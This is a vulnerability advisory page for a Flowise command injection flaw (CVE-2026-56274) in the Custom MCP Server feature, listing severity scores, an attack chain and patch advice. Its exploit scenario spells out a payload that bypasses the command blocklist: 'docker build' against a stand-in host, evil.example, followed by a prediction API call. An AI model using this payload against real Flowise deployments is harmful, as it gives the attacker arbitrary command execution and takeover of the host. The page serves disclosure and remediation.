Skip to main content

Flowise CVE-2026-56274

| EUVDEUVD-2026-38434 HIGH
OS Command Injection (CWE-78)
2026-06-23 VulnCheck GHSA-8rhx-2hcv-q49g
8.7
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-reachable Flowise UI/API, low complexity, requires any-role account or chatflow-permissioned API key (PR:L), no user interaction, full host RCE gives C/I/A:H.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

4
Patch available
Jun 23, 2026 - 14:17 EUVD
Source Code Evidence Fetched
Jun 23, 2026 - 13:05 vuln.today
Analysis Generated
Jun 23, 2026 - 13:05 vuln.today
CVE Published
Jun 23, 2026 - 12:13 cve.org
HIGH 8.7

DescriptionCVE.org

Flowise before 3.1.2 contains multiple OS command injection vulnerabilities in the Custom MCP Server feature due to incomplete command-flag validation and a regex bypass in local file access restrictions. An attacker with a Flowise account of any role, or API access with view/update permissions for chatflows, can configure a malicious MCP server to bypass the validateCommandFlags blocklist (for example, 'docker build' is not blocked, and 'npx --yes' is not blocked while only '-y' is) and the validateArgsForLocalFileAccess checks, resulting in execution of arbitrary commands on the Flowise host.

AnalysisAI

Remote code execution in Flowise before 3.1.2 allows any authenticated user (or API caller with chatflow view/update permissions) to abuse the Custom MCP Server feature and run arbitrary OS commands on the host. The validateCommandFlags blocklist and validateArgsForLocalFileAccess regex are incomplete - for example 'docker build' is permitted and 'npx --yes' is permitted while only '-y' is blocked - letting attackers point Flowise at a hostile Dockerfile or local script to achieve full host compromise. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain Flowise account or API key
Delivery
Create chatflow with Custom MCP Server node
Exploit
Submit docker build or npx --yes payload
Execution
Bypass validateCommandFlags denylist
Persist
Flowise spawns attacker command on host
Impact
Execute Dockerfile RUN or script for host takeover

Vulnerability AssessmentAI

Exploitation The target must be Flowise <= 3.1.1 with the Custom MCP Server feature reachable to the attacker, and the attacker must hold either a Flowise account of any role or an API key with view and update permissions on chatflows - fully unauthenticated exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H (8.7 High) is consistent with the description: exploitation is network-reachable, low-complexity, requires some privilege (an account of any role, or an API key with chatflow view/update), needs no user interaction, and yields full confidentiality/integrity/availability impact on the host. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who has signed up for (or been given) a low-privilege Flowise account, or who has obtained an API key with view/update on chatflows, creates a chatflow containing a Custom MCP Server node configured with command 'docker' and args ['build','https://evil.example/']; the validateCommandFlags check passes because 'build' is not in the docker blocklist. The attacker then issues POST /api/v1/prediction/{chatflows_id} which causes Flowise to invoke 'docker build' against the remote URL, pulling and executing a hostile Dockerfile whose RUN instructions and volume-mount tricks break out to the Flowise host. …
Remediation Vendor-released patch: upgrade flowise and flowise-components to 3.1.2 or later, which extends the validateCommandFlags blocklist and tightens the validateArgsForLocalFileAccess regex (see the GHSA-m99r-2hxc-cp3q advisory). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Flowise deployments and determine current versions; review recent authentication logs and API access for signs of exploitation; isolate any instances exposed to untrusted networks. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2025-66570 CRITICAL POC
10.0 Dec 05

cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allow

CVE-2026-47668 CRITICAL POC
10.0 Jun 05

Unauthenticated remote code execution in DbGate (npm package dbgate-serve, versions <= 7.1.8) lets remote attackers exec

CVE-2025-56157 CRITICAL POC
9.8 Dec 18

Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al

CVE-2026-24841 CRITICAL POC
9.9 Jan 28

Dokploy self-hosted PaaS prior to 0.26.6 has a critical command injection vulnerability (CVSS 9.9) allowing authenticate

CVE-2026-33309 CRITICAL POC
9.9 Mar 19

An authenticated path traversal vulnerability in Langflow's file upload functionality allows attackers to write arbitrar

CVE-2026-24740 CRITICAL POC
9.9 Jan 27

Critical access control flaw in Dozzle Docker log viewer allows users restricted by label filters to escape their scope

Share

CVE-2026-56274 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy